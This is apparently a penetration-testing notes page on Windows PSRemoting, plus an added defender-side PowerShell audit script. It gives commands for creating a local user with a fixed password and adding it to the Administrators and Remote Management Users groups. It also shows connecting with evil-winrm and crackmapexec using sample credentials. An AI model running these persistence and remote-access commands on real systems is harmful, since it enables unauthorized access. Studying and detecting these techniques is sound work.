# PSRemoting

## Enabling PSRemoting

After getting administrator access to a machine it is possible to enable PSRemoting:

```
Enable-PSRemoting
```

It might be useful to add a new user, or a user you already have, to the local `Administrators` or `Remote Management Users` group.

```
net user user Welcome01! /add
net localgroup administrators user /add
net localgroup "Remote Management Users" user /add
```
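
Seen from the defender's side, the steps above leave a footprint on the host that can be audited. The script below is an added example, not part of the original page. It assumes an elevated Windows PowerShell 5.1+ session, English group names, and that account-management auditing writes events 4720 and 4732 to the Security log; the 7-day look-back is an arbitrary choice.

```powershell
# Added example: audit a host for the PSRemoting changes described above.
# Assumption: elevated session; $LookBackDays is arbitrary and adjustable.
$LookBackDays = 7
$since = (Get-Date).AddDays(-$LookBackDays)

# 1. Is the WinRM service running, and how is it configured to start?
Get-Service -Name WinRM | Select-Object Name, Status, StartType

# 2. Which WinRM listeners exist? Enable-PSRemoting creates an HTTP listener.
Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
    Select-Object Name, Keys

# 3. Who can open a remote session? Review both groups for unexpected members.
foreach ($group in 'Administrators', 'Remote Management Users') {
    Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue |
        Select-Object @{ n = 'Group'; e = { $group } }, Name, ObjectClass, PrincipalSource
}

# 4. Recent account creations (4720) and local group additions (4732).
#    For 4732 the Target field is the group name and MemberSid is the added account.
$filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since }
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Flatten the named EventData fields into a lookup table.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        [pscustomobject]@{
            Time      = $_.TimeCreated
            EventId   = $_.Id
            Actor     = $data['SubjectUserName']
            Target    = $data['TargetUserName']
            MemberSid = $data['MemberSid']
        }
    } | Sort-Object Time
```

A WinRM service that is unexpectedly running, together with a recent 4720 followed by 4732 events for `Administrators` or `Remote Management Users`, matches the sequence shown in this section.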

## Accessing the machine

### PowerShell Enter-PSSession

```
Enter-PSSession ws01
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FANNgKhgHnPzr5ah829Yp%2Fimage.png?alt=media&#x26;token=695dec88-6637-40d6-b867-f998aea99b74" alt=""></div>

### Evil-WinRM

* <https://github.com/Hackplayers/evil-winrm>

```
evil-winrm -i 10.0.0.128 -u john -p 'Welcome2022!'
```

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2Fauvb3oBugGDdlBVOoEmz%2Fimage.png?alt=media\&token=93a983b5-0b59-4b58-a9c7-8ba18981f5ba)

### CrackMapExec

* <https://github.com/byt3bl33d3r/CrackMapExec>

```
crackmapexec winrm 10.0.0.128 -u john -p 'Welcome2022!'
```

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FrrPr9Fk1D336UPHlCDd0%2Fimage.png?alt=media\&token=0e806306-bf75-4bd2-986b-11f8d8d7857c)

{% hint style="info" %}

#### Observation

During testing I found out that crackmapexec is really slow over winrm if Windows Firewall is enabled on our fully up-to-date Windows 10 machine.
{% endhint %}

